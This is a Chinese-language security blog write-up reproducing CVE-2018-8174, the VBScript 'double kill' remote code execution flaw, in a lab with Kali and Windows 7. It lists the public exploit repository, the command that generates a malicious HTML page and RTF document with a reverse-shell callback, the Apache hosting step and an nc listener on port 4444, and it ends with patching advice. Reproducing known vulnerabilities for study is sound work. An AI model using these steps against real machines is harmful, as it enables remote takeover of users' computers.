CVE20188174-双杀0day漏洞复现 – 作者:凯信特安全团队

漏洞描述:

CVE-2018-8174是Windows VBScriptEngine 代码执行漏洞,由于 VBScript 脚本执行引擎(vbscript.dll)存在该漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户受诱导或不慎点击恶意链接或文档,攻击者便可远程获取当前用户系统权限,进而完全控制用户电脑。

2018年4月18日国内某信息安全公司监控到一例使用该漏洞的攻击活动后,当天与微软公司沟通,将相关信息提交到微软。微软在4月20日确认此漏洞,于5月8号发布了官方安全补丁对其进行修复,并将其命名为 CVE-2018-8174,在国内该漏洞则被称为“双杀”漏洞。

复现过程

攻击机:Linuxkali    ip:192.168.1.117

靶机:Windows7专业版    ip:192.168.1.118

注:本次由于靶机环境限制,仅以网站点击恶意链接获取权限方法验证该漏洞


首先从github下载项目:

#git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

图片.png

生成带有恶意VBscript的html页面和word文档

#pythonCVE-2018-8174.py -u http://192.168.220.117/exploit.html -o msf.rtf -i192.168.220.117 -p 4444图片.png

其中:-u指定URL 地址,-o指定生成文档,-i指定监听地址,-p指定监听端口

注:生成之前需进入到项目文件夹下,否则提示找不到文件

 生成后ls查看当前目录下的文件,确保所需要的文件完整

图片.png将explot.html复制到/var/www/html路径下,并开启apache服务

图片.pngnc指令,用于监听4444端口图片.png

开始监听后,我们用靶机,也就是windows7浏览器打开攻击机生成的恶意链接:192.168.1.117/exploit.html图片.png

虽然网页报错,但可以 发现攻击机已经拿到靶机的系统权限图片.png

修复建议

此漏洞已在2018年5月8日被微软官方修复,win10不受此漏洞影响,win10以下版本安装过该补丁后不受此漏洞影响。

来源:freebuf.com 2019-01-10 15:04:27 by: 凯信特安全团队

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论